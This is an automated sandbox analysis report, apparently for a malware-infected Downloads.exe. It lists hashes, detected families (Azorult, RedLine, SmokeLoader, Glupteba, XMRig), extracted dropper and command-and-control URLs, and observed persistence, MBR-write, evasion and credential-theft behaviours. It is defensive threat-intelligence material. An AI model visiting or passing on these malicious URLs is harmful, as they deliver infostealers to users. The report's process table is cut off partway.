azorult | 19e65276c47b1ee3d2f1a72d5ec00e914794a3ff62607477254b41b491eed281

Analysis

max time kernel
108s
max time network
600s
platform
windows10_x64
resource
win10v20201028
submitted
06-03-2021 13:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Downloads.exe
Size

11.6MB
MD5

86d9d6d6c5b307b0d5a9789965486fbf
SHA1

6a3e318c14745ffb6f92c3efb021d3baa94ee154
SHA256

19e65276c47b1ee3d2f1a72d5ec00e914794a3ff62607477254b41b491eed281
SHA512

8f0807d7b628dd616448993606a975c5ecb77130e7bf7040bc8e2932f8e45d1c3298e9e37be14eb65e9a6aed69d775fd22412d550580e1cb6ee4afc9f1361ae9

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://labsclub.com/welcome

Extracted

Family

azorult

http://kvaka.li/1210776429.php

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2019

http://10022020newfolder1002002131-service1002.space/

http://10022020newfolder1002002231-service1002.space/

http://10022020newfolder3100231-service1002.space/

http://10022020newfolder1002002431-service1002.space/

http://10022020newfolder1002002531-service1002.space/

http://10022020newfolder33417-01242510022020.space/

http://10022020test125831-service1002012510022020.space/

http://10022020test136831-service1002012510022020.space/

http://10022020test147831-service1002012510022020.space/

http://10022020test146831-service1002012510022020.space/

http://10022020test134831-service1002012510022020.space/

http://10022020est213531-service100201242510022020.ru/

http://10022020yes1t3481-service1002012510022020.ru/

http://10022020test13561-service1002012510022020.su/

http://10022020test14781-service1002012510022020.info/

http://10022020test13461-service1002012510022020.net/

http://10022020test15671-service1002012510022020.tech/

http://10022020test12671-service1002012510022020.online/

http://10022020utest1341-service1002012510022020.ru/

http://10022020uest71-service100201dom2510022020.ru/

rc4.i32

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2312-1131-0x00000000038D0000-0x000000000412D000-memory.dmp	family_glupteba
behavioral2/memory/2312-1133-0x0000000000400000-0x0000000000C77000-memory.dmp	family_glupteba
behavioral2/memory/2312-1132-0x0000000000400000-0x0000000000C77000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3052-655-0x0000000000400000-0x0000000000428000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

XMRig Miner Payload 2 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/3716-357-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/6196-358-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig

Executes dropped EXE 50 IoCs

Processes:

file.exefile.exefile.exeBTRSetp.exeBTRSetp.exeBTRSetp.exeBTRSetp.exeBB57.tmp.exeBB57.tmp.exeBB57.tmp.exeSetup.exeSetup.exemd2_2efs.exemd2_2efs.exeBB57.tmp.exeaskinstall20.exeaskinstall20.exeaskinstall20.exekeygen-step-4.exekeygen-step-4.exekeygen-step-4.exekeygen-step-4.exekeygen-step-1.exekeygen-step-1.exekeygen-step-1.exeInstall.exefile.exefile.exefile.exeBB57.tmp.exeBB57.tmp.exeBB57.tmp.exeBB57.tmp.exe7654484.84101547.16153723.671327749.144555200.508537361.936095024.673024737.337949177.87396240.44221941.46680866.77419691.818234507.904192944.462878343.31Windows Host.exe

pid	process
384	file.exe
2288	file.exe
2244	file.exe
3168	BTRSetp.exe
732	BTRSetp.exe
2840	BTRSetp.exe
392	BTRSetp.exe
1244	BB57.tmp.exe
3756	BB57.tmp.exe
3192	BB57.tmp.exe
3900	Setup.exe
2136	Setup.exe
1600	md2_2efs.exe
2232	md2_2efs.exe
3376	BB57.tmp.exe
2924	askinstall20.exe
4100	askinstall20.exe
4256	askinstall20.exe
4264	keygen-step-4.exe
4284	keygen-step-4.exe
4292	keygen-step-4.exe
4316	keygen-step-4.exe
4372	keygen-step-1.exe
4384	keygen-step-1.exe
4476	keygen-step-1.exe
4508	Install.exe
4724	file.exe
4808	file.exe
4968	file.exe
5088	BB57.tmp.exe
4196	BB57.tmp.exe
3876	BB57.tmp.exe
4124	BB57.tmp.exe
3216	7654484.84
3572	101547.1
3308	6153723.67
3268	1327749.14
3264	4555200.50
4980	8537361.93
2152	6095024.67
4524	3024737.33
3092	7949177.87
2784	396240.4
3848	4221941.46
4056	680866.7
3728	7419691.81
5132	8234507.90
5200	4192944.46
5288	2878343.31
5760	Windows Host.exe

Modifies Installed Components in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Suspicious Office macro 1 IoCs

Office document equipped with 4.0 macros.

macro xlm

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\gdiview.msi	office_xlm_macros

Checks BIOS information in registry 2 TTPs 8 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

4192944.466153723.676095024.67680866.7

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	4192944.46
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	4192944.46
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	6153723.67
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	6153723.67
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	6095024.67
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	6095024.67
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	680866.7
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	680866.7

Drops startup file 1 IoCs

Processes:

6153723.67

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url 6153723.67
Loads dropped DLL 1 IoCs

Processes:

MsiExec.exe

pid process

5228 MsiExec.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url	6153723.67

pid	process
5228	MsiExec.exe

themida 8 IoCs

Detects Themida, Advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\ProgramData\6153723.67	themida
C:\ProgramData\6153723.67	themida
behavioral2/memory/3308-217-0x0000000000850000-0x0000000000851000-memory.dmp	themida
behavioral2/memory/2152-251-0x00000000008C0000-0x00000000008C1000-memory.dmp	themida
behavioral2/memory/4056-303-0x0000000000060000-0x0000000000061000-memory.dmp	themida
behavioral2/memory/5200-309-0x0000000000E20000-0x0000000000E21000-memory.dmp	themida
behavioral2/memory/9620-930-0x0000000000130000-0x0000000000131000-memory.dmp	themida
behavioral2/memory/9700-934-0x0000000000D10000-0x0000000000D11000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

6095024.67680866.7101547.16153723.67

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\6095024.67"	6095024.67
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\680866.7"	680866.7
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host = "C:\\ProgramData\\Windows Host\\Windows Host.exe"	101547.1
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\6153723.67"	6153723.67

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 4 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

6153723.676095024.67680866.74192944.46

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	6153723.67
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	6095024.67
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	680866.7
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	4192944.46

Enumerates connected drives 3 TTPs 49 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

msiexec.exemsiexec.exeexplorer.exe

description	ioc	process
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\D:	explorer.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 39 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
968	ip-api.com
300	checkip.amazonaws.com
414	ipinfo.io
660	ipinfo.io
667	ipinfo.io
669	ipinfo.io
811	checkip.amazonaws.com
894	ipinfo.io
199	ipinfo.io
564	ipinfo.io
592	ipinfo.io
918	ipinfo.io
1032	ipinfo.io
403	ipinfo.io
458	ipinfo.io
543	checkip.amazonaws.com
547	ip-api.com
580	ipinfo.io
703	ipinfo.io
706	ip-api.com
31	api.ipify.org
191	api.ipify.org
197	ipinfo.io
700	ipinfo.io
938	ipinfo.io
1112	ipinfo.io
640	ipinfo.io
1045	ipinfo.io
176	api.ipify.org
620	ipinfo.io
635	ipinfo.io
773	ipinfo.io
828	ipinfo.io
907	ipinfo.io
522	ipinfo.io
980	checkip.amazonaws.com
307	ipinfo.io
505	checkip.amazonaws.com
920	ipinfo.io

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
bootkit persistence

Bootkit
T1067

Processes:

Setup.exe

description ioc process

File opened for modification \??\PhysicalDrive0 Setup.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

Processes:

6153723.676095024.67680866.74192944.46

pid process

3308 6153723.67
2152 6095024.67
4056 680866.7
5200 4192944.46

description	ioc	process
File opened for modification	\??\PhysicalDrive0	Setup.exe

pid	process
3308	6153723.67
2152	6095024.67
4056	680866.7
5200	4192944.46

Suspicious use of SetThreadContext 4 IoCs

Processes:

BB57.tmp.exeBB57.tmp.exeBB57.tmp.exeBB57.tmp.exe

description	pid	process	target process
PID 1244 set thread context of 5088	1244	BB57.tmp.exe	BB57.tmp.exe
PID 3756 set thread context of 4196	3756	BB57.tmp.exe	BB57.tmp.exe
PID 3192 set thread context of 3876	3192	BB57.tmp.exe	BB57.tmp.exe
PID 3376 set thread context of 4124	3376	BB57.tmp.exe	BB57.tmp.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

8936 5248 WerFault.exe Z9HxagfFH.exe
9052 4232 WerFault.exe BuWciOcI7.exe

pid	pid_target	process	target process
8936	5248	WerFault.exe	Z9HxagfFH.exe
9052	4232	WerFault.exe	BuWciOcI7.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

BB57.tmp.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	BB57.tmp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	BB57.tmp.exe

Delays execution with timeout.exe 3 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exe

pid process

7748 timeout.exe
10752 timeout.exe
1872 timeout.exe

pid	process
7748	timeout.exe
10752	timeout.exe
1872	timeout.exe

Kills process with taskkill 23 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeTASKKILL.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
7688	taskkill.exe
3164	taskkill.exe
9600	taskkill.exe
6588	taskkill.exe
9412	taskkill.exe
4644	taskkill.exe
5580	taskkill.exe
6272	taskkill.exe
4940	taskkill.exe
608	taskkill.exe
6964	taskkill.exe
1684	taskkill.exe
9128	TASKKILL.exe
9852	taskkill.exe
5896	taskkill.exe
9012	taskkill.exe
10004	taskkill.exe
1612	taskkill.exe
8820	taskkill.exe
9836	taskkill.exe
3624	taskkill.exe
8724	taskkill.exe
4396	taskkill.exe

Modifies registry class 10 IoCs

Processes:

explorer.exeDownloads.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Instance	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance	Downloads.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	Downloads.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	explorer.exe

Runs .reg file with regedit 2 IoCs

Processes:

regedit.exeregedit.exe

pid process

9140 regedit.exe
8416 regedit.exe
Runs ping.exe 1 TTPs 7 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid process

7380 PING.EXE
7572 PING.EXE
6764 PING.EXE
3828 PING.EXE
3152 PING.EXE
4108 PING.EXE
3156 PING.EXE

pid	process
9140	regedit.exe
8416	regedit.exe

pid	process
7380	PING.EXE
7572	PING.EXE
6764	PING.EXE
3828	PING.EXE
3152	PING.EXE
4108	PING.EXE
3156	PING.EXE

Script User-Agent 36 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	521	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	639	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1031	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	499	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	563	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	579	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	701	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	771	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1109	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	254	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	893	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	934	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1046	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1115	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1121	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	198	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	618	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	817	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	826	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1044	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	406	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	634	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	478	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	919	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	306	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	591	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	668	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1037	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1100	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	411	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	396	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	456	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	462	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	659	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	775	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	201	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

BB57.tmp.exe6095024.67

pid process

5088 BB57.tmp.exe
5088 BB57.tmp.exe
2152 6095024.67
2152 6095024.67
2152 6095024.67
2152 6095024.67
2152 6095024.67
2152 6095024.67
Suspicious behavior: SetClipboardViewer 2 IoCs

Processes:

396240.47419691.81

pid process

2784 396240.4
3728 7419691.81

pid	process
5088	BB57.tmp.exe
5088	BB57.tmp.exe
2152	6095024.67
2152	6095024.67
2152	6095024.67
2152	6095024.67
2152	6095024.67
2152	6095024.67

pid	process
2784	396240.4
3728	7419691.81

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

BTRSetp.exeBTRSetp.exeBTRSetp.exeBTRSetp.exeexplorer.exechashepro3.exemsiexec.exemsiexec.exe6153723.674555200.507654484.841327749.143024737.33

description	pid	process
Token: SeDebugPrivilege	392	BTRSetp.exe
Token: SeDebugPrivilege	732	BTRSetp.exe
Token: SeDebugPrivilege	3168	BTRSetp.exe
Token: SeDebugPrivilege	2840	BTRSetp.exe
Token: SeShutdownPrivilege	4576	explorer.exe
Token: SeCreatePagefilePrivilege	4576	explorer.exe
Token: SeShutdownPrivilege	4576	explorer.exe
Token: SeCreatePagefilePrivilege	4576	explorer.exe
Token: SeDebugPrivilege	4508	chashepro3.exe
Token: SeShutdownPrivilege	4576	explorer.exe
Token: SeCreatePagefilePrivilege	4576	explorer.exe
Token: SeShutdownPrivilege	4576	explorer.exe
Token: SeCreatePagefilePrivilege	4576	explorer.exe
Token: SeShutdownPrivilege	4576	explorer.exe
Token: SeCreatePagefilePrivilege	4576	explorer.exe
Token: SeShutdownPrivilege	4028	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4028	msiexec.exe
Token: SeSecurityPrivilege	4156	msiexec.exe
Token: SeCreateTokenPrivilege	4028	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	4028	msiexec.exe
Token: SeLockMemoryPrivilege	4028	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4028	msiexec.exe
Token: SeMachineAccountPrivilege	4028	msiexec.exe
Token: SeTcbPrivilege	4028	msiexec.exe
Token: SeSecurityPrivilege	4028	msiexec.exe
Token: SeTakeOwnershipPrivilege	4028	msiexec.exe
Token: SeLoadDriverPrivilege	4028	msiexec.exe
Token: SeSystemProfilePrivilege	4028	msiexec.exe
Token: SeSystemtimePrivilege	4028	msiexec.exe
Token: SeProfSingleProcessPrivilege	4028	msiexec.exe
Token: SeIncBasePriorityPrivilege	4028	msiexec.exe
Token: SeCreatePagefilePrivilege	4028	msiexec.exe
Token: SeCreatePermanentPrivilege	4028	msiexec.exe
Token: SeBackupPrivilege	4028	msiexec.exe
Token: SeRestorePrivilege	4028	msiexec.exe
Token: SeShutdownPrivilege	4028	msiexec.exe
Token: SeDebugPrivilege	4028	msiexec.exe
Token: SeAuditPrivilege	4028	msiexec.exe
Token: SeSystemEnvironmentPrivilege	4028	msiexec.exe
Token: SeChangeNotifyPrivilege	4028	msiexec.exe
Token: SeRemoteShutdownPrivilege	4028	msiexec.exe
Token: SeUndockPrivilege	4028	msiexec.exe
Token: SeSyncAgentPrivilege	4028	msiexec.exe
Token: SeEnableDelegationPrivilege	4028	msiexec.exe
Token: SeManageVolumePrivilege	4028	msiexec.exe
Token: SeImpersonatePrivilege	4028	msiexec.exe
Token: SeCreateGlobalPrivilege	4028	msiexec.exe
Token: SeDebugPrivilege	3308	6153723.67
Token: SeDebugPrivilege	3264	4555200.50
Token: SeDebugPrivilege	3216	7654484.84
Token: SeDebugPrivilege	3268	1327749.14
Token: SeDebugPrivilege	4524	3024737.33
Token: SeShutdownPrivilege	4576	explorer.exe
Token: SeCreatePagefilePrivilege	4576	explorer.exe
Token: SeShutdownPrivilege	4576	explorer.exe
Token: SeCreatePagefilePrivilege	4576	explorer.exe
Token: SeShutdownPrivilege	4576	explorer.exe
Token: SeCreatePagefilePrivilege	4576	explorer.exe
Token: SeShutdownPrivilege	4576	explorer.exe
Token: SeCreatePagefilePrivilege	4576	explorer.exe
Token: SeShutdownPrivilege	4576	explorer.exe
Token: SeCreatePagefilePrivilege	4576	explorer.exe
Token: SeShutdownPrivilege	4576	explorer.exe
Token: SeCreatePagefilePrivilege	4576	explorer.exe

Suspicious use of FindShellTrayWindow 14 IoCs

Processes:

explorer.exemsiexec.exe

pid	process
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4028	msiexec.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe

Suspicious use of SendNotifyMessage 11 IoCs

Processes:

explorer.exe

pid	process
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe

Suspicious use of SetWindowsHookEx 7 IoCs

Processes:

Downloads.exeSetup.exeSetup.exeSearchUI.exeShellExperienceHost.exe

pid process

504 Downloads.exe
504 Downloads.exe
3900 Setup.exe
2136 Setup.exe
5160 SearchUI.exe
3548 ShellExperienceHost.exe
3548 ShellExperienceHost.exe

pid	process
504	Downloads.exe
504	Downloads.exe
3900	Setup.exe
2136	Setup.exe
5160	SearchUI.exe
3548	ShellExperienceHost.exe
3548	ShellExperienceHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

keygen-step-4.exekeygen-step-4.exekeygen-step-4.exeBB57.tmp.exeBB57.tmp.exeBB57.tmp.exeBB57.tmp.exeBTRSetp.exe

description	pid	process	target process
PID 4284 wrote to memory of 4724	4284	keygen-step-4.exe	file.exe
PID 4284 wrote to memory of 4724	4284	keygen-step-4.exe	file.exe
PID 4284 wrote to memory of 4724	4284	keygen-step-4.exe	file.exe
PID 4292 wrote to memory of 4808	4292	keygen-step-4.exe	file.exe
PID 4292 wrote to memory of 4808	4292	keygen-step-4.exe	file.exe
PID 4292 wrote to memory of 4808	4292	keygen-step-4.exe	file.exe
PID 4316 wrote to memory of 4968	4316	keygen-step-4.exe	file.exe
PID 4316 wrote to memory of 4968	4316	keygen-step-4.exe	file.exe
PID 4316 wrote to memory of 4968	4316	keygen-step-4.exe	file.exe
PID 1244 wrote to memory of 5088	1244	BB57.tmp.exe	BB57.tmp.exe
PID 1244 wrote to memory of 5088	1244	BB57.tmp.exe	BB57.tmp.exe
PID 1244 wrote to memory of 5088	1244	BB57.tmp.exe	BB57.tmp.exe
PID 1244 wrote to memory of 5088	1244	BB57.tmp.exe	BB57.tmp.exe
PID 1244 wrote to memory of 5088	1244	BB57.tmp.exe	BB57.tmp.exe
PID 1244 wrote to memory of 5088	1244	BB57.tmp.exe	BB57.tmp.exe
PID 1244 wrote to memory of 5088	1244	BB57.tmp.exe	BB57.tmp.exe
PID 1244 wrote to memory of 5088	1244	BB57.tmp.exe	BB57.tmp.exe
PID 1244 wrote to memory of 5088	1244	BB57.tmp.exe	BB57.tmp.exe
PID 1244 wrote to memory of 5088	1244	BB57.tmp.exe	BB57.tmp.exe
PID 1244 wrote to memory of 5088	1244	BB57.tmp.exe	BB57.tmp.exe
PID 1244 wrote to memory of 5088	1244	BB57.tmp.exe	BB57.tmp.exe
PID 1244 wrote to memory of 5088	1244	BB57.tmp.exe	BB57.tmp.exe
PID 3756 wrote to memory of 4196	3756	BB57.tmp.exe	BB57.tmp.exe
